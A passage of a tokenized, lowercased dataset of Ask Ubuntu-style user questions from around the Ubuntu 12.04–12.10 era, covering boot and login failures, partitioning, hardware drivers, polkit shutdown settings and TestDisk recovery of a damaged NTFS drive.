entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu universe deb http : //archive.ubuntu.com/ubuntu-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //archive.ubuntu.com/ubuntu multiverse deb http : //archive.ubuntu.com/ubuntu-updates multiverse # # uncomment the following two lines to add software from the 'backports' # # repository . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . # deb http : //archive.ubuntu.com/ubuntu/ maverick-backports main restricted universe multiverse # deb-src http : //archive.ubuntu.com/ubuntu/ maverick-backports main restricted universe multiverse # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu maverick partner deb-src http : //archive.canonical.com/ubuntu maverick partner # # uncomment the following two lines to add software from ubuntu's # # 'extras ' repository . # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu maverick main deb-src http : //extras.ubuntu.com/ubuntu maverick main deb http : //security.ubuntu.com/ubuntu maverick-security restricted main multiverse universe deb http : //archive.ubuntu.com/ubuntu maverick main universe restricted multiverse deb http : //archive.ubuntu.com/ubuntu maverick-updates universe main multiverse restricted deb http : //archive.ubuntu.com/ubuntu maverick-proposed universe main multiverse restricted deb http : //archive.ubuntu.com/ubuntu maverick-backports universe main multiverse restricted
243613	lubuntu 12.04 can not login via gui after a kernel update and return error messages	after kernel update , lubuntu 12.04 can not login via gui and return these error messages : stopping save kernel messages stopping system v runlevel compatibility
243616	ubuntu 12.04 lts only works when when i replace splash with acpi=off	i 'm very new to ubuntu and this site as well . i 've grown up on windows and felt like trying something new . so here is my problem : i have a dell inspiron m5030 that got a virus so i reformatted and re-installed windows but i guess the virus may have still been in there because my laptop still ran very slow and i ran a malware scan and it found some things even right after a factory reset . so i decided to download ubuntu 12.04 lts , install it via dvd and chose the option to fully replace windows . everything seemed to work fine , no errors popped up and wile it was loading i could connect to my wifi and set up my user name and password . once it was finished i tried logging in and it would just freeze when i hit enter after entering my password at the log in screen . i could still move my cursor around but no buttons or clicking did anything . i 've tried re-installing and the same thing happened . so i 've tried installing again but this time i 've selected the option to auto-login . then when i would reboot or power on it would just leave me at a blank screen . i searched around on the web to find a solution and i found something that said when booting up hold the shift key ( getting to grub ? ) , hit e , replace where it says something like quiet splash with acpi=off and then hit ctrl+x . that seemed to work and that is where i am typing this now . but now i have no little battery icon at the top left and no way of checking my battery status or charge . i also must replace the quiet splash with acpi=off everytime i reboot or power on . also when i power down it gets stuck at a screen with some text and the last thing it says is 3168.221823 system halted . so then i must manually hold the power button to power off . i 'm sorry this is so lengthy but i tried to be as descriptive as possible so maybe i can find a solution .
243617	i ca n't identify partition when installing ubuntu 12.04 ?	i am installing ubuntu 12.04 and when you set how much for each os , it does n't say what is on each side . so i ca n't tell which side is vista and which side is ubuntu . i am assuming the left side is ubuntu but i am not sure . it used to have a colored bar with info on the bar but now it is a white strip and i ca n't tell .
243621	how to mount root.disk from wubi when booted from dual boot install of ubuntu ?	i 'm running ubuntu 12.04 ltfs . on the same disk , i have another win7 . on the ntfs win7 , i have buntu 11.04 running on a ext4 partition that was installed with wubi . i 'd like to be able to access my buntu 11.04 files , from my ubuntu 12.04 os . is this possible ? i was thinking this might work : mount -t ext4 -r /dev/sda4/ubuntu/disks/root.disk /media/wubi or maybe mount a mount : mount -t ntfs -r /dev/sda4 /media/win7wubi mount -t ext4 -r /media/win7wubi/ubuntu/disks/root.disk /media/buntu1104
243622	python sqlite command in path	i am installing a program , and one of the requirements is to have python sqlite2 installed . i check this by : $ python -c `` import sqlite3 '' the second requirement is : '' additionally you must have the sqlite3 command on your path . this can usually be found in a package called sqlite or sqlite3 . '' can someone explain what i should do ? where and how to set that path ?
243626	multiparty video conferencing between linux/windows ?	i have a group of friends that we are often physically separate , but we like to play old school table top rpg 's . a video conferencing solution seems ideal for this . what we need is cross platform , video ( everyone sees everyone ) , sound ( everyone hears everyone ) , desktop sharing ( everyone see 's at least one , maybe all ) , and possibly whiteboard ( everyone sees & can draw ) . i have a server running already , so i 'm up to installing something centralized . although p2p might be easier over all . i found bigbluebutton . sounds like a wonderful idea , but they built that software around the idea that it was the only thing on the server . grrrrr it 's the only thing i 've found that i can not get to install on ubuntu 12.04 . and i do n't want to play around with running it as a vm . not sure my machine will handle it well as it 's just on spec for bbb w/o being vm 'd . so , if anyone has suggestions , i 'd love to hear them .
243628	ca n't convert iso to img on mac	i followed the instructions here and i got a dmg instead . this is what i entered : cd desktop hdiutil convert ubuntu-12.10-desktop-amd64.iso -format udrw -o ubuntu-12.10-desktop-amd64.img then it gave me a dmg . what should i do ?
243630	`` shut down '' takes me to greeter now ?	update - removing my usb wifi dongle seems to cure the problem . so does disabling networking ( but not disabling wifi alone ) . now what ? update 2 - the 'uptime ' command says there are 2 users logged in . this will surely cause the behaviour i 'm describing . i 'm going to dig around and see if i can determine who the other user is . nevermind , this was only due to the terminal i had open on the desktop . if i log in to any account , choosing 'shut down ' or restart takes me to the greeter . the same happens in the greeter itself - i am left there . no other users are logged in . if i do n't log in to an account after rebooting , the restart and shut down menu options in the greeter will work if i choose them immediately after the greeter appears . see a bootchart of this here : https : //www.dropbox.com/s/ufb7s6ykvlbkjxj/jarlath-ep35-ds3-precise-20130116-3.png if i wait 5 seconds or log in to a user account - they wo n't work . i 've tested this several times . see a bootchart of this ( logged in as user ) : https : //www.dropbox.com/s/yx6jgoo2c7fy6pp/jarlath-ep35-ds3-precise-20130116-4.png sudo -halt and sudo reboot both work as they should however . i 've output all processes from a logged in account ( ps -a ) and left them here : www.pastebin.com/e3whthym i assume that either an update , something new from the software center ( not likely as i did n't install anything at the time ) or a terminal command i issued is causing this . here 's my .bash_history from way before the problem began : pastebin.com/1de5tcd3 my kernel is 3.2.0-35 , i tried also booting older kernels : 3.2.0-32 , 31 , 30 , 29 , 26 , 25 , 24 , 23 , 22 - > no difference as per suggestions in bug https : //bugs.launchpad.net/ubuntu/+source/gnome-session/+bug/838792 i tried : greped my /etc/init.d for services using su and removed 1 ( clamav ) . killed pulseaudio neither of these helped . some more context below ; jarlath @ jarlath-ep35-ds3 : ~ $ cat /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf [ configuration ] adminidentities=unix-group : sudo ; unix-group : admin jarlath @ jarlath-ep35-ds3 : ~ $ groups jarlath adm cdrom sudo dip plugdev lpadmin sambashare vboxusers movies from logviewer , here is the output that is generated at the time i try to shutdown from the user menu : auth.log feb 28 15:39:01 jarlath-ep35-ds3 cron [ 15249 ] : pam_unix ( cron : session ) : session opened for user root by ( uid=0 ) feb 28 15:39:01 jarlath-ep35-ds3 cron [ 15249 ] : pam_unix ( cron : session ) : session closed for user root feb 28 15:39:16 jarlath-ep35-ds3 polkitd ( authority=local ) : unregistered authentication agent for unix-session : /org/freedesktop/consolekit/session6 ( system bus name :1.114 , object path /org/gnome/policykit1/authenticationagent , locale en_us.utf-8 ) ( disconnected from bus ) feb 28 15:39:19 jarlath-ep35-ds3 lightdm : pam_unix ( lightdm : session ) : session closed for user jarlath feb 28 15:39:22 jarlath-ep35-ds3 lightdm : pam_unix ( lightdm : session ) : session opened for user lightdm by ( uid=0 ) feb 28 15:39:22 jarlath-ep35-ds3 lightdm : pam_ck_connector ( lightdm : session ) : nox11 mode , ignoring pam_tty :0 feb 28 15:39:25 jarlath-ep35-ds3 lightdm : pam_succeed_if ( lightdm : auth ) : requirement `` user ingroup nopasswdlogin '' not met by user `` jarlath '' feb 28 15:39:26 jarlath-ep35-ds3 dbus [ 580 ] : [ system ] rejected send message , 2 matched rules ; type= '' method_call '' , sender= '' :1.184 '' ( uid=104 pid=15385 comm= '' /usr/lib/indicator-datetime/indicator-datetime-ser '' ) interface= '' org.freedesktop.dbus.properties '' member= '' getall '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' :1.15 '' ( uid=0 pid=1438 comm= '' /usr/sbin/console-kit-daemon -- no-daemon `` ) feb 28 15:39:30 jarlath-ep35-ds3 lightdm : pam_unix ( lightdm : session ) : session closed for user lightdm feb 28 15:39:30 jarlath-ep35-ds3 lightdm : pam_unix ( lightdm : session ) : session opened for user jarlath by ( uid=0 ) feb 28 15:39:30 jarlath-ep35-ds3 lightdm : pam_ck_connector ( lightdm : session ) : nox11 mode , ignoring pam_tty :0 feb 28 15:39:34 jarlath-ep35-ds3 polkitd ( authority=local ) : registered authentication agent for unix-session : /org/freedesktop/consolekit/session9 ( system bus name :1.198 [ /usr/lib/policykit-1-gnome/polkit-gnome-authentication-agent-1 ] , object path /org/gnome/policykit1/authenticationagent , locale en_us.utf-8 ) feb 28 15:39:45 jarlath-ep35-ds3 dbus [ 580 ] : [ system ] rejected send message , 2 matched rules ; type= '' method_call '' , sender= '' :1.208 '' ( uid=1000 pid=15640 comm= '' /usr/lib/indicator-datetime/indicator-datetime-ser '' ) interface= '' org.freedesktop.dbus.properties '' member= '' getall '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' :1.15 '' ( uid=0 pid=1438 comm= '' /usr/sbin/console-kit-daemon -- no-daemon `` ) syslog feb 28 15:39:01 jarlath-ep35-ds3 cron [ 15250 ] : ( root ) cmd ( [ -x /usr/lib/php5/maxlifetime ] & & [ -d /var/lib/php5 ] & & find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin + $ ( /usr/lib/php5/maxlifetime ) ! -execdir fuser -s { } 2 > /dev/null \ ; -delete ) feb 28 15:39:16 jarlath-ep35-ds3 gnome-session [ 3479 ] : warning : unable to load desktop file '/usr/bin/everpad.desktop ' : no such file or directory feb 28 15:39:16 jarlath-ep35-ds3 gnome-session [ 3479 ] : eggsmclient-warning : desktop file '/usr/share/applications/everpad.desktop ' has malformed icon key 'everpad.png ' ( should not include extension ) feb 28 15:39:16 jarlath-ep35-ds3 gnome-session [ 3479 ] : warning : unable to find desktop file 'transmission bittorrent client.desktop ' : valid key file could not be found in search dirs feb 28 15:39:16 jarlath-ep35-ds3 gnome-session [ 3479 ] : warning : unable to find desktop file 'gnome-transmission bittorrent client.desktop ' : valid key file could not be found in search dirs feb 28 15:39:18 jarlath-ep35-ds3 gnome-session [ 3479 ] : warning : unable to stop system : authorization is required feb 28 15:39:20 jarlath-ep35-ds3 networkmanager [ 1173 ] : < warn > error requesting auth for org.freedesktop.networkmanager.sleep-wake : ( 3 ) gdbus.error : org.freedesktop.dbus.error.namehasnoowner : gdbus.error : org.freedesktop.dbus.error.namehasnoowner : could not get uid of name ':1.126 ' : no such name feb 28 15:39:20 jarlath-ep35-ds3 networkmanager [ 1173 ] : < warn > error requesting auth for org.freedesktop.networkmanager.enable-disable-wifi : ( 3 ) gdbus.error : org.freedesktop.dbus.error.namehasnoowner : gdbus.error : org.freedesktop.dbus.error.namehasnoowner : could not get uid of name ':1.126 ' : no such name feb 28 15:39:20 jarlath-ep35-ds3 networkmanager [ 1173 ] : < warn > error requesting auth for org.freedesktop.networkmanager.enable-disable-wwan : ( 3 ) gdbus.error : org.freedesktop.dbus.error.namehasnoowner : gdbus.error : org.freedesktop.dbus.error.namehasnoowner : could not get uid of name ':1.126 ' : no such name feb 28 15:39:20 jarlath-ep35-ds3 networkmanager [ 1173 ] : < warn > error requesting auth for org.freedesktop.networkmanager.enable-disable-wimax : ( 3 ) gdbus.error : org.freedesktop.dbus.error.namehasnoowner : gdbus.error : org.freedesktop.dbus.error.namehasnoowner : could not get uid of name ':1.126 ' : no such name feb 28 15:39:20 jarlath-ep35-ds3 networkmanager [ 1173 ] : < warn > error requesting auth for org.freedesktop.networkmanager.network-control : ( 3 ) gdbus.error : org.freedesktop.dbus.error.namehasnoowner : gdbus.error : org.freedesktop.dbus.error.namehasnoowner : could not get uid of name ':1.126 ' : no such name feb 28 15:39:20 jarlath-ep35-ds3 networkmanager [ 1173 ] : < warn > error requesting auth for org.freedesktop.networkmanager.wifi.share.protected : ( 3 ) gdbus.error : org.freedesktop.dbus.error.namehasnoowner : gdbus.error : org.freedesktop.dbus.error.namehasnoowner : could not get uid of name ':1.126 ' : no such name feb 28 15:39:20 jarlath-ep35-ds3 networkmanager [ 1173 ] : < warn > error requesting auth for org.freedesktop.networkmanager.wifi.share.open : ( 3 ) gdbus.error : org.freedesktop.dbus.error.namehasnoowner : gdbus.error : org.freedesktop.dbus.error.namehasnoowner : could not get uid of name ':1.126 ' : no such name feb 28 15:39:20 jarlath-ep35-ds3 networkmanager [ 1173 ] : < warn > error requesting auth for org.freedesktop.networkmanager.settings.modify.system : ( 3 ) gdbus.error : org.freedesktop.dbus.error.namehasnoowner : gdbus.error : org.freedesktop.dbus.error.namehasnoowner : could not get uid of name ':1.126 ' : no such name feb 28 15:39:20 jarlath-ep35-ds3 networkmanager [ 1173 ] : < warn > error requesting auth for org.freedesktop.networkmanager.settings.modify.own : ( 3 ) gdbus.error : org.freedesktop.dbus.error.namehasnoowner : gdbus.error : org.freedesktop.dbus.error.namehasnoowner : could not get uid of name ':1.126 ' : no such name feb 28 15:39:20 jarlath-ep35-ds3 networkmanager [ 1173 ] : < warn > error requesting auth for org.freedesktop.networkmanager.settings.modify.hostname : ( 3 ) gdbus.error : org.freedesktop.dbus.error.namehasnoowner : gdbus.error : org.freedesktop.dbus.error.namehasnoowner : could not get uid of name ':1.126 ' : no such name feb 28 15:39:21 jarlath-ep35-ds3 acpid : client 3292 [ 0:0 ] has disconnected feb 28 15:39:21 jarlath-ep35-ds3 acpid : client 3292 [ 0:0 ] has disconnected feb 28 15:39:21 jarlath-ep35-ds3 acpid : client connected from 15280 [ 0:0 ] feb 28 15:39:21 jarlath-ep35-ds3 acpid : 1 client rule loaded feb 28 15:39:22 jarlath-ep35-ds3 acpid : client connected from 15280 [ 0:0 ] feb 28 15:39:22 jarlath-ep35-ds3 acpid : 1 client rule loaded feb 28 15:39:26 jarlath-ep35-ds3 rtkit-daemon [ 2276 ] : successfully made thread 15412 of process 15412 ( n/a ) owned by '104 ' high priority at nice level -11 . feb 28 15:39:26 jarlath-ep35-ds3 rtkit-daemon [ 2276 ] : supervising 7 threads of 2 processes of 2 users . feb 28 15:39:27 jarlath-ep35-ds3 rtkit-daemon [ 2276 ] : successfully made thread 15416 of process 15412 ( n/a ) owned by '104 ' rt at priority 5 . feb 28 15:39:27 jarlath-ep35-ds3 rtkit-daemon [ 2276 ] : supervising 8 threads of 2 processes of 2 users . feb 28 15:39:27 jarlath-ep35-ds3 rtkit-daemon [ 2276 ] : successfully made thread 15417 of process 15412 ( n/a ) owned by '104 ' rt at priority 5 . feb 28 15:39:27 jarlath-ep35-ds3 rtkit-daemon [ 2276 ] : supervising 9 threads of 2 processes of 2 users . feb 28 15:39:27 jarlath-ep35-ds3 rtkit-daemon [ 2276 ] : successfully made thread 15418 of process 15412 ( n/a ) owned by '104 ' rt at priority 5 . feb 28 15:39:27 jarlath-ep35-ds3 rtkit-daemon [ 2276 ] : supervising 10 threads of 2 processes of 2 users . feb 28 15:39:27 jarlath-ep35-ds3 rtkit-daemon [ 2276 ] : successfully made thread 15419 of process 15412 ( n/a ) owned by '104 ' rt at priority 5 . feb 28 15:39:27 jarlath-ep35-ds3 rtkit-daemon [ 2276 ] : supervising 11 threads of 2 processes of 2 users . feb 28 15:39:27 jarlath-ep35-ds3 rtkit-daemon [ 2276 ] : successfully made thread 15420 of process 15412 ( n/a ) owned by '104 ' rt at priority 5 . feb 28 15:39:27 jarlath-ep35-ds3 rtkit-daemon [ 2276 ] : supervising 12 threads of 2 processes of 2 users . feb 28 15:39:31 jarlath-ep35-ds3 gnome-session [ 15446 ] : eggsmclient-warning : desktop file '/home/jarlath/.config/autostart/everpad.desktop ' has malformed icon key 'everpad.png ' ( should not include extension ) feb 28 15:39:36 jarlath-ep35-ds3 goa [ 15570 ] : goa-daemon version 3.4.0 starting [ main.c:112 , main ( ) ] feb 28 15:40:45 jarlath-ep35-ds3 dbus [ 580 ] : [ system ] activating service name='org.freedesktop.packagekit ' ( using servicehelper ) feb 28 15:40:45 jarlath-ep35-ds3 aptdaemon : info : initializing daemon feb 28 15:40:45 jarlath-ep35-ds3 aptdaemon.packagekit : info : initializing packagekit compat layer feb 28 15:40:45 jarlath-ep35-ds3 dbus [ 580 ] : [ system ] successfully activated service 'org.freedesktop.packagekit' feb 28 15:40:45 jarlath-ep35-ds3 aptdaemon.packagekit : info : initializing packagekit transaction feb 28 15:40:45 jarlath-ep35-ds3 aptdaemon.worker : info : simulating trans : /org/debian/apt/transaction/dcf18c7d7f2c412a82d3288c2df8c094 feb 28 15:40:45 jarlath-ep35-ds3 aptdaemon.worker : info : processing transaction /org/debian/apt/transaction/dcf18c7d7f2c412a82d3288c2df8c094 feb 28 15:40:46 jarlath-ep35-ds3 aptdaemon.packagekit : info : get updates ( ) feb 28 15:40:46 jarlath-ep35-ds3 aptdaemon.worker : info : finished transaction /org/debian/apt/transaction/dcf18c7d7f2c412a82d3288c2df8c094 solution : i have found a solution . i am not using it as an answer as it does n't identify the root cause , but for others who are happy with just a solution for themselves they should try this advise from grendndelman.net create a file named /etc/polkit-1/localauthority/50-local.d/usershutdown.pkla ( the name must end in .pkla ) and put the following in it : [ allow shutdown ] identity=unix-user : * action=org.freedesktop.consolekit.system.stop-multiple-users resultany=yes resultinactive=yes resultactive=yes [ allow restart ] identity=unix-user : * action=org.freedesktop.consolekit.system.restart-multiple-users resultany=yes resultinactive=yes resultactive=yes
243635	touchpad moves way too fast	i recently put ubuntu on my msi u120 . when i use my touchpad though , it is way too sensitive and the pointer moves super fast . i went to the place where you can change the sensitivity in the dash but it was already to as `` slow '' as it could go . so i did some research and found that this worked : sudo apt-get install gsynaptics gpointing-device-settings
243638	ati graphics card	i just installed ubuntu 12.10 and i want to use ati 's driver because my computer is getting hot but i 'm afraid to install cause i 've tried to install before and i had serious problem . my graphics card model ati 6520g.i do n't know what will 覺 do i hope you can help me
243639	`` ctrl+space '' has been bound to invoke some input method and does not work in emacs or eclipse auto-complete	in emacs run in terminal , ctrl+space is a standard shortcut key to select region . but under ubuntu 12.04 , it will invoke some input method for non-english language . i was wondering if i can reserve it for emacs only ? under system settings - > keyboard - > shortcuts , i could n't find to what ctrl+space has been bound . strange . other programs , especially auto-complete in eclipse , also seem to have a problem handling ctrl+space .
243643	disk operations consuming all memory - ubuntu 12.10 i386	i 'm having a strange problem with a new clean install of ubuntu 12.10 , any disk operations i do , like restoring a backup eats all my 8gb of ram , and it does n't seen to release the memory , so i 'm using swap . it looks like a memory leak , but i do n't know if i 'm right . i do n't know where to begin for diagnose this things . details : i do n't have any applications open , except my backup being restored by ubuntu 's backup application ( duplicity ) . i 'm monitoring the memory utilization by htop and free . i know there 's a lot of cached memory , but the system becomes slow and i 'm using swap , so i think the kernel or whatever it is causing this problem is not freeing cache when requested .
243644	unable to set google chrome as default browser in ubuntu 12.10	despite several attempts at making google chrome work as my default browser i simply can not . i 've read countless threads on the internet , checked mimeapps.list and so on , tried about anything , from simple system configuration by going to settings and change as the default browser there , which , for some odd reason , wo n't allow me to set a default browser , to more advanced terminal scripting . this is a clean install of ubuntu 12.10 x64 bit updated to the latest version including kernels .
243645	how can i install development libraries for 'icu-le ' and 'icu-uc ' ?	i get this when i try to compile 'harfbuzz ' . no package 'icu-le ' found no package 'icu-uc ' found i have tried 'sudo apt-get install libicu-uc . but that does not solve the problem .
243647	how can i fade the screen to black ?	i 've got an ubuntu setup with openbox , and i 'm just using it to play various media using vlc and feh . when switching media i have been `` fading out '' by using xrandr -- brightness to decrement the screen brightness , then swap out the media , then fade back in . this approach is a bit tedious , and on my new intel ivy bridge gpu , it looks terrible and lags horribly . is there another way to simply fade out / back in , perhaps with a screensaver or other x command ?
243655	how do i detect wireless networks ?	i installed ubuntu 12.10 on my old acer aspire 5100 , because i use it mainly for browsing , i want to learn to use linux . however , upon switching to ubuntu , i am unable to detect any wireless networks . ( ethernet works fine though ) . i think it has something to do with my network card , but i do n't know . i 've been searching for answers for the last 2 hours to no avail . someone please help !
243660	configuring apple magic trackpad in 12.04	how should i configure a magic trackpad in 12.04 to ignore my thumb at the bottom of the trackpad change scrolling speed change gesture functions ( e.g . have three-finger tap = middle-click ) , if doing so is possible ? i tried installing gsynaptics and using gpointing-device-settings , but its palm-detection and scrolling settings do nothing . ( in fact , it shows scrolling as disabled , even though scrolling is enabled in system settings > mouse and touchpad , and definitely works . )
243666	how can i use ubuntu for android ?	i am interesting with ubuntu for android . as it is introduced , `` when they connect their phone to a monitor , mouse and keyboard , it becomes a pc . `` , i wan na know , what 's meaning of `` connect their phone to a monitor , mouse and keyboard '' ? is that mean i should find out an adapter to connect a mouse or keyboard to my phone ? not quite understand . antbody can explan it ? thanks . -landy
243667	just installed ubuntu 12.10 , it works fine until i log out and log back in , then none of the programs load and i have a blank desktop	i 'm new to these forums and pretty new to ubuntu , but i 've been trying to learn and i just installed ubuntu 12.10 on my xps17 as a dual-boot with windows 7 . i had some problems during installation but i managed to tentatively fix them and ubuntu was working fine on first boot-up but when i installed bumblebee with these instructions : and restarting my computer , none of the menu 's and the dock thing would load , i could see my desktop items but when i tried to open one of my folders , it would load fine , but their would be no outline to the window . i really dont know what else to say , i 've never used ubuntu before so i may have made some huge nooby mistake , but if anyone is willing to help , i 'm willing to do what i need to to fix this . c : my video card is a nvidia geforce 555m , if that 's of any use .
243668	how to run applications in x from ssh ?	i have recently switched from windows 7 to ubuntu 12.10 . in ubuntu 12.10 i am using putty to connect to a unix machine remotely where several of my files are stored but editing texts files through the command prompt is tedious in my opinion . how can i configure putty to allow me to run xterms and in turn run software such as emacs ( which is installed on the unix machine ) to edit files on the unix machine from my ubuntu machine ? in windows an x server is needed such as xming , is any additional software necessary ?
243679	ubuntu 12.10 dual boot with windows 8 on two hdds	i am attempting to install ubuntu 12.10 on a machine in dual boot with windows 8. the machine has two hard disks - each about 2tb in size . i install windows 8 on /dev/sda and this works fine - windows 8 boots up and i can do everything on it ok. then i put in the ubuntu 12.10 live cd and go to install ubuntu . i am presented with the following options for installing ubuntu : and i choose something else then click continue . the following screen comes up : when i click the dropdown box it shows me the following options : /dev/mapper/isw_bjchifhafj_volume0 linux device-mapper ( mirror ) ( 2.0 tb ) /dev/mapper/isw_bjchifhafj_volume0p1 linux device-mapper ( linear ) ( 367.0 mb ) /dev/mapper/isw_bjchifhafj_volume0p1 windows 8 ( loader ) /dev/sda i select /dev/mapper/isw_bjchifhafj_volume0p1 linux device-mapper ( linear ) ( 367.0 mb ) for the boot loader . i then highlight /dev/mapper/isw_bjchifhafj_volume0 in the list of devices and click new partition table . this automatically creates the free space shown highlighted in the above picture . i then doubleclick on the free space and set the type to primary and ext4 , set the size to 381mb , and set the mount point as / . it whinges about not having swap-space , but since i can not figure out how to further partition the drive i just click continue . it then starts installing linux and immediately dies . i ca n't remember what the error was but it just wiped my windows installation completely from the hard drive . what did i do wrong ?
243683	is the ipod nano ( 5th generation ) compatible with ubuntu ?	i have an ipod nano ( 5th generation ) . i want to know if it works with ubuntu without problems ? ipod nano 5gen
243690	boot stuck on `` checking battery state [ ok ] ''	loaded ubuntu 12.10 but during boot gets stuck at checking battery state [ ok ] . it appears its some kind of loop where this message keeps repeating . any idea on how to fix ?
243691	how can i export my tomboy notes into evernote ?	i want to export my tomboy notes to the evernote web service , i have seen this web site but i do n't want to send my tomboy notes to an untrusted site where they may be put to unknown use . is there any other way ?
243692	how to run two de 's on one partition	how to segregate 2 desktop editions ( kde/gnome ) installed on one partition using kdm/gdm to start , does n't matter which . but not share the apps , bins or libs . i do n't want the mish-mush of gnome and kde colliding and i do n't want to dual boot . or is there a way to adjust for the app-crowding that is expected . the /home must be the only shared folder of the system . is this too far fetched ?
243697	ca n't install 12.10 on a separate partition in a pc with windows 7	i want to install ubuntu 12.10 along side with windows7 , i have already installed win7 , my hard disk ( 600gb ) contains 6 partitions . i want install install ubuntu to a separate partition , but when i try to install ubuntu . it shows only 2 partitions , c ( 100gb ) driver and another partition which already taken the rest of the space ( 500gb ) .i want to install ubuntu to a free partition ( 100gb ) . i can create new partition from 500gb , but i am afraid to do that , because my other partitions contains data , could any one help me to figure out this ? this images took from my lap top ( 50gb for windows ) , same issue is existing in my desktop thank you
243703	dreamweaver-like html editor for ubuntu	i 'm trying out ubuntu 12.04 after a long run with os x , and was wondering if there was an html ( and css and php ) editor with roughly the same amount of control as adobe dreamweaver .
243718	boot into ubuntu from android tablet with live usb drive	i have an android asus slider tablet . i have successfully installed ubuntu to an 8gb thumb drive . i would like to boot into the thumb drive the same way i do with a windows system except i would like to do this with my android tablet . i only know how to boot into recovery mode with the tablet , but when i plug the usb drive into the tablet i do not see the option to boot into my tablet . what is the best route to take . thanks in advance .
243728	how do i manually insert my signature in thunderbird in ubuntu ?	how can i manually add my signature in thunderbird ? i have set up my thunderbird signature and it works perfect on my new messages and replies and forwards . but , sometimes i need to edit the forwards and do n't want my signature in the middle or at the top of the message . so i delete it and edit what i want . then i want to insert it at the bottom . but ca n't find any option to insert signature manually . thunderbird 17.0.2 ubuntu 12.04.01
243729	how do i change proxy settings automatically based on the network that i connect to ?	i use my laptop at school and at home . however , internet access to each requires different proxy settings . i searched for a way to do this , but i could n't find a solution , short of manually setting it .
243733	hd external error , file system seem damaged , and can not look file with testdisk/photorec ... .. ntfs	comment : nb : hd=harddisk my hd label kiomiiro-nii ( upper case ) size from box 750 gb but in propeties 698 gb . i always use fix drive letter using m : for this hdexternal ( i dont have a backup because i do n't have free space storage ... . ) now my hd is not detected at explorer , on usb safely remove just say usb mass storage without drive letter . and partition manager is say unallocated space ... ... . the last thing i remember when hd still can be read , it say '' failed to write m : / ... [ i forgot maybe mft or something ... . ] '' then i use testdisk ... . i ca n't change characteristic to l and e just * , p and d but another hd with same merk just diferent size its using p [ with analize to look current structure ] maybe this always showing showing and showing ... .. partition : read error ca n't open filesystem . filesystem seem damaged . read error at 0/17/1 ( lba=1071 ) 0 d hpfs - ntfs 254705 79 58 341390 148 22 1392598837 hpfs - ntfs 254705 79 58 341390 148 22 1392598837 repair mft -- - > ca n't read ntfs mft . ... etc i already try file recovery use commercial file recovery and just get < 80 % of my data [ not this hd , other one ] /data do n't get all ( where the other ? ) and folder structure is wrong . after use testdisk 6.14 , is not showing any partition , but when used 6.13 is showing , but label kiomiiro-nii not here and i write it to primary . after boot it 's still ca n't read it and get prompt `` format '' ... ... no drive letter no , drive label and i open 6.14 and 6.13 its still no drive label kiomiiro-nii , and ca n't open list file its say file system damage , and i go advance its say boot and backup sector is ok. and i open mft to is say ca n't read ntfs mft . ================================ here my note what i 'm doing : =========using 6.14======= disk /dev/sdb - 750 gb / 698 gib - storejet transcend intel - > disk /dev/sdb - 750 gb / 698 gib - storejet transcend chs 91201 255 63 - sector size=512 analize - > current partition structure : ( usually there is a list , but now no partition list here ... ... .. ) partition : read error quicksearch - > search under vista bla bla bla ... .. ( y ) ( usually there is a list , but now no partition list here ... ... .. ) deeper search - > disk /dev/sdb - 750 gb / 698 gib - chs 91201 255 63 analyse cylinder 1/91200 : 00 % read error at 0/17/1 ( lba=1071 ) ... meanwhile ... .. invalid ntfs or exfat boot 0 d hpfs - ntfs 254705 79 58 341390 148 22 1392598837 hpfs - ntfs 254705 79 58 341390 148 22 1392598837 ... ... ... ... final ... ... ... ... . the hardisk ( 750 gb/698 gib ) seem too small ! ( < 2808 gb/2615 gib ) check the hardisk size : hd jumpers setting , bios detection ... [ the hardisk size is right , why you say wrong ( seem too small ! ) ] continue - > no partition listed here ... ... ... ... ... .. -_-' deeper search - > [ again ] advance - > no partition available ================================= -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -next =========using 6.13======= disk /dev/sdb - 750 gb / 698 gib - storejet transcend intel - > disk /dev/sdb - 750 gb / 698 gib - chs 91201 255 63 analize - > current partition structure : ( usually there is a list , but now no partition list here ... ... .. ) partition : read error quicksearch - > search under vista bla bla bla ... .. ( y ) disk /dev/sdb-750 gb/698 gib - chs 91201 255 63 partition start end size in sectors * hpfs - ntfs 0 1 1 91200 254 63 1465144002 p - > ( open list ) ca n't open filesystem . filesystem seems damaged . quit - > [ back to screen before ] disk /dev/sdb-750 gb/698 gib - chs 91201 255 63 partition start end size in sectors * hpfs - ntfs 0 1 1 91200 254 63 1465144002 [ partition characteristik just * p d is can to use here , i ca n't change to l ] deeper search - > disk /dev/sdb - 750 gb / 698 gib - chs 91201 255 63 analyse cylinder 1/91200 : 00 % read error at 0/17/1 ( lba=1071 ) ... meanwhile ... .. invalid ntfs or exfat boot 0 d hpfs - ntfs 254705 79 58 341390 148 22 1392598837 hpfs - ntfs 254705 79 58 341390 148 22 1392598837 ... ... ... ... final ... ... ... ... . the hardisk ( 750 gb/698 gib ) seem too small ! ( < 2808 gb/2615 gib ) check the hardisk size : hd jumpers setting , bios detection ... [ the hardisk size is right , why you say wrong ( seem too small ! ) ] continue - > partition start end size in sectors * hpfs - ntfs 0 1 1 91200 254 63 1465144002 i change into p ( primary , because the choice show up just * d p ) ... ... partition start end size in sectors p hpfs - ntfs 0 1 1 91200 254 63 1465144002 write- > booting ( hd still connect ) ca n't read files yet and become like this 1 p hpfs - ntfs 0 1 1 91200 254 63 1465144002 no partition is bootable try again with 6.13 and it say ca n't open filesystem . filesystem seems damaged . advance - > no partition available =========================================== next i use 6.14 again and it say ca n't open filesystem . filesystem seems damaged . advance say boot sector and back up sector is ok sector are identical repair mft -- - > ca n't read 